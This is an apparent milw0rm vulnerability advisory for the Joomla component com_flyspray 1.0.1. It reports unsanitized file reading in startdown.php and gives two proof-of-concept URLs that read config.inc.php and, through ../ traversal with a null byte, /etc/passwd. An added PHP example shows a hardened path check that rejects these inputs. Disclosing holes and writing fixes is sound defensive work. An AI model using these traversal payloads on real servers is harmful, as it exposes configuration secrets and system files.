*****************************************************************************************************************************
Component name: com_flyspray
Affected Version: 1.0.1
Download page: http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Author: Dr Max Virus
Location: Egypt
*****************************************************************************************************************************
Bug in: startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem: The file variable is not sanitized, so you can read any file on the server, including the config file.
*****************************************************************************************************************************
POC:

http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
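A hardened form of the line-52 call, as an added example that is not part of the original advisory or the com_flyspray source. The function name resolve_download, the attachments directory layout and the sample files are assumptions; the rejected inputs mirror the two file values from the POC.

```php
<?php
// Added example: hypothetical hardened replacement for a bare readfile($file).
// resolve_download() and the directory layout are assumptions, not com_flyspray code.

function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty names and NUL bytes (the %00 suffix in the POC) outright.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ../ and symlinks; it returns false for missing files.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // The resolved path must still sit under the download directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo tree: a config file sitting next to an attachments directory.
$root = sys_get_temp_dir() . '/flyspray_demo_' . getmypid();
@mkdir($root . '/attachments', 0700, true);
file_put_contents($root . '/config.inc.php', "constructed secret\n");
file_put_contents($root . '/attachments/report.txt', "constructed attachment\n");

$inputs = ['report.txt', 'config.inc.php', '../config.inc.php',
           "../../../../../etc/passwd\0"];
foreach ($inputs as $in) {
    $path = resolve_download($root . '/attachments', $in);
    // Only a non-null $path would ever be handed to readfile($path).
    printf("%-34s => %s\n", addcslashes($in, "\0"),
           $path === null ? 'REJECTED' : 'served');
}

// Remove the constructed demo files.
unlink($root . '/attachments/report.txt');
unlink($root . '/config.inc.php');
rmdir($root . '/attachments');
rmdir($root);
```

Only report.txt is served; the other three inputs are rejected because they do not exist inside the attachments directory, resolve outside it, or contain a NUL byte.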
Thx To: str0ke & Nukedx & Thehacker & All My Friends
Special Gr33Ts: ASIANEAGLE & The Master & Kacper
****************************************************************************************************************************
# milw0rm.com [2006-11-26]